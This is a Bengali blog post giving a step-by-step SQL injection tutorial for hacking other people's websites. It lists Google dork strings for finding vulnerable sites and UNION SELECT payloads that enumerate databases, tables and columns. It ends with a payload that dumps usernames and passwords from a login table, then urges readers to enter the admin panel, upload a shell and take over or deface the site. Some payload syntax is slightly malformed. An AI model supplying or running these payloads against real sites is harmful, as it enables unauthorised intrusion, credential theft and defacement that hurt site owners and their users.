এটা হল বর্তমান সময়ের সবচেয়ে সেরা এবং জনপ্রিয় ওয়েবসাইট হ্যাকিং পদ্ধতি
# Sql Injection কি
এটা হল বর্তমান সময়ের সবচেয়ে সেরা এবং জনপ্রিয় ওয়েবসাইট হ্যাকিং পদ্ধতি । হ্যাকিং কোন কঠিন বিষয় না । আপনার যদি ইচ্ছা থাকে এখানে তাহলে আপনি খুব দ্রুত শিখে নিতে পারবেন । (এখানে দেখুন)
অনেকেই হাসছেন যে, এটা তো কঠিন ব্যাপার না, টুলস দিয়েই শেখা যায় । কিন্তু জেনে রাখুন, টুলস যখন থাকবে না তখন কিভাবে কাজ করবেন? আর এটা শেখার জন্য অনেক অনেক বই পড়ে শেখা লাগে । মজার ব্যাপার হল, শুধু টুলস দিয়েই সব সাইট মানে VULNERABLE সাইট হ্যাক করতে পারবেন না।
# Sql Injection দিয়ে কি ধরনের কাজ করা যাবে ?
- এসকিউএল সার্ভার হ্যাক করা যায়
- সাইটের লগিন এরিয়া বাইপাস করা যায়
- ডাটাবেস ইনফো মডিফাই করা যায়
- ডাটাবেস ইনফোতে এক্সেস নিতে পারা
এখন শুরু করছি ওয়েবসাইট হ্যাকিং এর জনপ্রিয় মাধ্যম ''''
এবার আমাদের vulnerable site খুঁজে বের করতে হবে গুগল কিংবা অন্য সার্চ ইঞ্জিন থেকে । সার্চ ইঞ্জিনে এরকম সাইট লাখ লাখ রয়েছে । আপনি GOOGLE DORK ব্যবহার করে অনেক সাইট পেতে পারেন । যেই সাইটে আপনি php?id=1 বা এই জাতীয় কিছু দেখবেন তাহলে বুঝতে পারবেন এগুলো Vulnerable site । এই সাইটগুলো SQL INJECTION দিয়ে হ্যাক করা যায় ।
inurl:/add_cart.php?num=
inurl:/add-to-cart.php?ID=
inurl:/addToCart.php?idProduct=
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=
উপরের এগুলো সব Vulnerable site. আপনি গুগল dork লিখে সার্চ দিন গুগলে । লাখ লাখ লিংক পাবেন এরকম । আমি শুধুমাত্র সামান্য কয়েকটা উদাহরন দিলাম । এবার আপনি সেখানে প্রাপ্ত একটা সাইটে প্রবেশ করুন । ধরুন -
xyz.com/index.php?Id=1 (আজগুবি সাইট)
মনে রাখবেন এই সাইট বিভিন্ন রকম হতে পারে । (আরও দেখুন) তবে সাইটটা Vulnerable কিনা সেটা আমরা এখন যাচাই করবো । তার জন্য এই সাইটের পাশে (') এই সাইন দেবো ।
যেমনঃ xyz.com/index.php?id=1'
এখন সাইট যদি vulnerable হয়ে থাকে তাহলে ERROR দেখাবে এরকম -
you have an error in your sql syntax;check the manual that corresponds to your MYSQL server vision for the right syntax to use near '\'' at line 1
অথবা, warning:mysql_fetch_array()
কিংবা এরকম হতে পারে যে, সাইট থেকে ডাটা এরর দেখাচ্ছে । তাহলেও সেটা ভুলনারাবল সাইট । নয়ত সেটা ভুলবারাবল কখনই নয় ।
এখন আমরা অন্য আরেকটা সাইট খুঁজে বের করবো । ( দেখতে এখানে ক্লিক করুন ) সেখানেও এরর পেয়ে গেলে আমরা SQL INJECTION করবো । পুরোটা সময় আমরা সাইট খুঁজে বের করলাম এখন আমরা হ্যাকিং করবো 😉😉😉😉
এখন আমরা নির্দিষ্ট সাইটের কলাম সংখ্যা কত সেটা খুঁজে বের করবো । সে কারনে (') এই চিহ্নটা অর্ডার বাই স্টেটমেন্ট এ দাঁড় করাব । যেমন -
http://www.xyz.com/page.php?id=3 order by 1– NO ERROR
http://www.xyz.com/page.php?id=3 order by 2– NO ERROR
http://www.xyz.com/page.php?id=3 order by 3– NO ERROR
https://www.xyz.com/page.php?id=3 order by 4- ERROR -------------------
----- এইখানে সাইটের কন্টেন্ট মিসিং হচ্ছে ।
এখানে আমরা অর্ডার বাই ৪ এ আসার পরে এরর দেখতে পাচ্ছি । কিন্তু ৩ পর্যন্ত কোন এরর নেই । তার মানে সাইটে ৩ টা কলাম আছে । অনেক সময় এখানে ৫০/১০০/৫০০ পর্যন্ত আসতে পারে । কিন্তু দেখা গেল কোন এরর দেখা যাচ্ছে না।
তখন id / parameter এর পরে ' মার্কটা দিতে হবে এবং একটা + যুক্ত করতে হবে । এরকম হবে -
https://www.xyz.com/page.php?id=3 order by 4-+
সুতরাং আমরা এখন জানি যে, আমাদের সাইটে ৩ টা কলাম রয়েছে ।
এখন আমরা সবগুলো কলাম ইউনিয়ম সিলেক্ট স্টেটমেন্ট ব্যবহার করে সিলেক্ট করবো । এই ইউনিয়ন সিলেক্ট... মুলত ডাটা দেখার জন্য ব্যবহার করা হয় । এখন নিচের কোড ব্যবহার করবো ।
https://www.xyz.com/page.php?id=3 union select
1,2,3-
এখন ওয়েবপেইজে কিছু নাম্বার দেখা যাবে । এগুলো ১-৩ এর ভেতর হবে কেননা আমাদের সাইটে কলাম হল ৩ টা । এবং যে কমান্ড উপরে দেখানো হল সেটা দ্বারা এই তিনটা কলামের ভেতর কোনটা স্ট্রিং । কিন্তু আপনি যদি কোন নাম্বার দেখতে না পান তাহলে parameter value এর আগে এটা ব্যবহার করুন (-) ,
যেমনঃ https://www.xyz.com/page.php?id=-3 union select
1,2,3-
Click here [why NIKON is best camera?]
এখনি আপনি পেইজে কিছু নাম্বার দেখতে পাবেন । ধরুন এখানে ২ দেখা যাচ্ছে । মানে ২ হচ্ছে এখানে string column থেকে আমরা ডাটা হ্যাক করতে পারবো । প্রায়ই উপরের এই কমান্ড কাজ করে না । তখন কি করবেন? তখন আমরা waf bypass করবো । এটা নিয়ে পরে কথা বলবো । (আরও জানুন)
এখন, আমরা ডাটা হ্যাক করবো । এখান থেকে সার্ভার এর সব গোপন ডাটা হ্যাক করে ফেলতে পারবো। এখানে আমরা ডাটাবেজের নাম database () কমান্ড ব্যবহার করে ডাটাবেজ ভার্সন বের করতে পারবো । এই পোস্টে আমরা ডাটাবেজ ইউজার নেইম এবং ভার্সন বের করবো ২ নম্বর কলামটা ব্যবহার করে । যেমনঃ
https://www.xyz.com/page.php?id=-3 union select
1, version(),group_concat(database(),0x3a,user()),3-
এখানে ox3a ব্যবহার করেছি । এটা সেমিকোলন (;) এর হেক্স ভ্যালু । এই দুইটা ডিফারেন্ট ভ্যালুকে ডিফারেন্ট প্যারামিটারে সেপারেট করে দেখাবে । এখন দেখা যাবে ২ নম্বর ভুলনারেবল এর জায়াগায় ডাটাবেস ভার্সন এবং ইউজার নেইম দেখা যাবে ।
এখান থেকে আমরা যে ডাটাগুলো পাবো তার জন্য কলাম নেইমের জায়গায় SQL QUERY লিখে রিপ্লেস করবো । এরকম দেখাবে -
https://www.xyz.com/page.php?id=-3 union select
1,group_concat(schema_name),3 from information_schema.schema-
এবার আমরা দুটো ডাটাবেস দেখতে পারবো। Information_schema ও site_database . এই সাইটের এডমিন যে নামে দিয়েছিল সে নামে দেখা যাবে । Information_schema তে আমরা কিছু করবো না কেননা এটা সিস্টেম টেবিল যা ডাটাবেসকে ডিফাইন করে। এই জিনিস আপনাদের বুঝতেও হবে না যদি শুধু ওয়েবসাইট হ্যাক করা ছাড়া আর কিছু বুঝতে না চান । কেননা এগুলো ইঞ্জিনিয়ারিং কথাবার্তা । হা করে তাকিয়ে থাকা ছাড়া আর ঘাড় হেলানো ছাড়া আপনার কোন ফয়দা হবে না । যাই হোক,
এখন, আমাদের কাছে ডাটাবেস রয়েছে । এখান থেকে টেবিল খুঁজে বের করবো । এখানে এখন where condition ব্যবহার করবো এই query ব্যবহার করে । (এখানে দেখুন)এবার টেবিলস নেইম বের করবো select statement ব্যবহার করে এবং where কন্ডিশন ব্যবহার করবো এই জন্য যে, কোন ডাটাবেস থেকে আমাদের টেবিলস বের করবো । যেমনঃ
https://www.xyz.com/page.php?id=-3 union select
1,group_concat(table_name),3 from information_schema.tables_where table_schema=database()-
এখন আপনি টেবিলস দেখতে পাবেন । মনে করি এগুলো আমাদের টেবিলস -
rchive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit
এবার আমরা খুঁজে বের করবো এর ভেতর কোনটা স্পর্শকাতর যেখানে খুবই গুরুত্বপূর্ণ ডাটা থাকে । এটা হল লগিন টেবিল । বিভিন্ন সময় বিভিন্ন রকম হতে পারে আপনার টেবিল নেইম তাই বুদ্ধি করে কাজ করতে হবে । মোটা মাথা দিয়ে হ্যাকিং হবে না । খুব দ্রুত কাজ করতে পারলে তবেই আপনি হ্যাকার হতে পারবেন । আতেল মার্কা কথা বাদ।
............................................
YouTube Full Bangla Training
এখন আমরা লগিন টেবিল থেকে ডাটা হ্যাক করবো । এখন আমরা group_concat(table_name) থেকে group_concat(column_name)
ও information_schema.tables থেকে information_schema.columns দিয়ে রিপ্লেস করবো এবং table_schema এর পরিবর্তে table_name লিখবো । এখন আমরা table_name কে একটা প্যারামিটার টেবিল নেম টি quote এ নিয়ে আসবো ।
table_name='login'
এবার কথা হচ্ছে, আমরা কেন quote ব্যবহার করেছি ? (ভিন্ন কিছু দেখুন)
এর ডাটা টাইপ হল varchar.
অনেক সময় এই নিয়ম কাজ করে না তখন কি করবেন? 😢😢 তখন আমরা টেবিল নেইম থেকে char এ পরিবর্তন করবো ।
এর জন্য মজিলা ব্রাউজারে হ্যাকবার নামে একটা এডঅন রয়েছে । সেটা যুক্ত করে নিন । তাহলে সহজেই char এ রূপান্তর করা যাবে । এখন আমরা login table কে char এ রিপ্লেস করার পর এরকম হবে -
char (107, 109, 104, 111) এরকম একটা কিছু হবে ।
এখন কমান্ডটি এভাবে ব্যবহার করতে হবে ।
https://www.xyz.com/page.php?id=-3 union select
1,group_concat(column_name)3 from information_schema.columns where table_name=char( 107, 109, 104, 111)-
এখন আমরা লগিন টেবিল এর কলাম দেখতে পাবো। এখানে থেকে আমরা Id, username, password, email, date_added,last login, session id, status ইত্যাদি পাবো ।
💜এখন সবচেয়ে আকাংক্ষিত কাজ শুরু - 💓
এখন আমরা কলাম থেকে আইডি এবং পাসওয়ার্ড হ্যাক করবো । এই (username,0x3a,password) কমান্ড ব্যবহার করে ২ নং টেবিলের ডাটা বের করবো । কম্যান্ড হল,
https://www.xyz.com/page.php?id=-3 union select
1,group-concat(username,0x3a,password),3 from login-
অবশেষে আপনি এখন ইউজার নেইম এবং পাসওয়ার্ড দেখতে পাবেন । 😀
এবার আপনার পালা -
সাইটে লগিন করুন । তারপর সাইটে এডমিন প্যানেলে প্রবেশ করুন । তারপর শেল আপলোড করে সাইটটা নিজের করে নিন নয়ত নিজের কাজের নিদর্শন স্বরূপ একটা সাইনবোর্ড ঝুলিয়ে দিন । Click Here
অনেক কষ্ট করে আপনাদের জন্য পোস্ট লিখি নিজের জানা এবং শেখার একটা অংশ আপনাদের সাথে শেয়ার করতে পারলে ভালো লাগে । আশা করি, এই লেখাটা আপনাদের ভালো লেগেছে । বেশি বেশি প্র্যাকটিস করুন । অবশ্যই কমেন্ট করে আপনার মতামত জানাবেন এবং যারা ওয়েবসাইট হ্যাকিং এ আগ্রহী তাদের জন্য এটা অবশ্যই আদর্শ পোস্ট হবে । নিজের লেখার নিজেই সুনাম জাহির করলাম 😉
সবাই ভালো থাকুন, সুস্থ থাকুন এই কামনায় । টাটা ।
No comments